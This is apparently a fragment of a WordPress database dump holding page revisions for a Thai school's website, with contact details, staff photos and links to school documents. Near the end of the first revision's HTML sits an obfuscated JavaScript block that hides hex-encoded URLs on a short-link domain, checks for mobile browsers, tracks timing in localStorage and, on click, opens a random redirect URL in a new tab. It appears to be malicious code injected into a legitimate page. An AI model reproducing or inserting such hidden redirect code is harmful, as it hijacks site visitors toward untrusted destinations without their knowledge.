-->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:30:53','2025-06-27 08:30:53','',19,'http://watprato.ssk.in.th/?p=578',0,'revision','',0),
(579,1,'2025-06-27 15:31:32','2025-06-27 08:31:32','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8cd9a2-b3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8cd9a2-b3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"> \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 170px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} 